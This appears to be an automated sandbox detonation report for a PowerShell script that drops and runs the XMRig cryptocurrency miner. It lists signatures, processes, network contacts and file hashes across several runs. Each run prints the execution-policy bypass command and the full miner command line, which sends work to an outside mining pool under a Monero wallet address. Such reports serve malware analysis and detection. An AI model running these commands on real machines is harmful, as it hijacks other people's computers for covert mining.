| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2024 wrote to memory of 1168 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2024 wrote to memory of 1168 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
Files
memory/2024-4-0x00007FFBF4EC3000-0x00007FFBF4EC4000-memory.dmp
memory/2024-5-0x00000207FA3B0000-0x00000207FA3D2000-memory.dmp
memory/2024-6-0x00007FFBF4EC0000-0x00007FFBF58AC000-memory.dmp
memory/2024-9-0x00000207FA560000-0x00000207FA5D6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4blua5mn.sh0.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2024-10-0x00007FFBF4EC0000-0x00007FFBF58AC000-memory.dmp
memory/2024-25-0x00007FFBF4EC0000-0x00007FFBF58AC000-memory.dmp
memory/2024-48-0x00000207FA700000-0x00000207FA712000-memory.dmp
memory/2024-61-0x00000207FA500000-0x00000207FA50A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1168-90-0x000001FF20200000-0x000001FF20220000-memory.dmp
memory/1168-91-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-92-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/2024-93-0x00007FFBF4EC3000-0x00007FFBF4EC4000-memory.dmp
memory/2024-94-0x00007FFBF4EC0000-0x00007FFBF58AC000-memory.dmp
memory/1168-95-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-96-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-97-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-98-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-99-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-100-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-101-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-102-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-103-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-104-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-105-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-106-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-107-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-108-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-109-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-110-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-111-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-112-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-113-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-114-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-115-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-116-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-117-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-118-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-119-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-120-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-121-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-122-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-123-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-124-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-125-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-126-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-127-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-128-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-129-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-130-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-131-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-132-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-133-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-134-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-135-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-136-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-137-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-138-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-139-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-140-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-141-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-142-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-143-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-144-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-145-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-146-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-147-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-148-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-149-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-150-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-151-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-152-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-153-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-154-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
memory/1168-155-0x00007FF6C9AF0000-0x00007FF6CA723000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:08
Platform
win11-20240508-en
Max time kernel
1789s
Max time network
1787s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4500 wrote to memory of 1384 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4500 wrote to memory of 1384 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/4500-0-0x00007FFFF6303000-0x00007FFFF6305000-memory.dmp
memory/4500-1-0x00007FFFF6300000-0x00007FFFF6DC2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hf54yurm.foy.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4500-10-0x000002CC28740000-0x000002CC28762000-memory.dmp
memory/4500-11-0x00007FFFF6300000-0x00007FFFF6DC2000-memory.dmp
memory/4500-12-0x00007FFFF6300000-0x00007FFFF6DC2000-memory.dmp
memory/4500-14-0x000002CC287E0000-0x000002CC287F2000-memory.dmp
memory/4500-15-0x000002CC287D0000-0x000002CC287DA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1384-46-0x0000024415ED0000-0x0000024415EF0000-memory.dmp
memory/1384-47-0x0000024415F20000-0x0000024415F40000-memory.dmp
memory/1384-48-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/4500-49-0x00007FFFF6300000-0x00007FFFF6DC2000-memory.dmp
memory/4500-50-0x00007FFFF6303000-0x00007FFFF6305000-memory.dmp
memory/1384-52-0x0000024417710000-0x0000024417730000-memory.dmp
memory/1384-51-0x00000244176F0000-0x0000024417710000-memory.dmp
memory/1384-53-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-54-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-55-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-57-0x0000024417710000-0x0000024417730000-memory.dmp
memory/1384-56-0x00000244176F0000-0x0000024417710000-memory.dmp
memory/1384-58-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-59-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-60-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-61-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-62-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-63-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-64-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-65-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-66-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-67-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-68-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-69-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-70-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-71-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-72-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-73-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-74-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-75-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-76-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-77-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-78-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-79-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-80-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-81-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-82-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-83-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-84-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-85-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-86-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-87-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-88-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-89-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-90-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-91-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-92-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-93-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-94-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-95-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-96-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-97-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-98-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-99-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-100-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-101-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-102-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-103-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-104-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-105-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-106-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-107-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-108-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-109-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-110-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-111-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-112-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-113-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-114-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-115-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
memory/1384-116-0x00007FF62D810000-0x00007FF62E443000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:13
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4196 wrote to memory of 5052 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4196 wrote to memory of 5052 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
Files
memory/4196-0-0x00007FFF9ADA3000-0x00007FFF9ADA4000-memory.dmp
memory/4196-5-0x000001F2FAEA0000-0x000001F2FAEC2000-memory.dmp
memory/4196-8-0x00007FFF9ADA0000-0x00007FFF9B78C000-memory.dmp
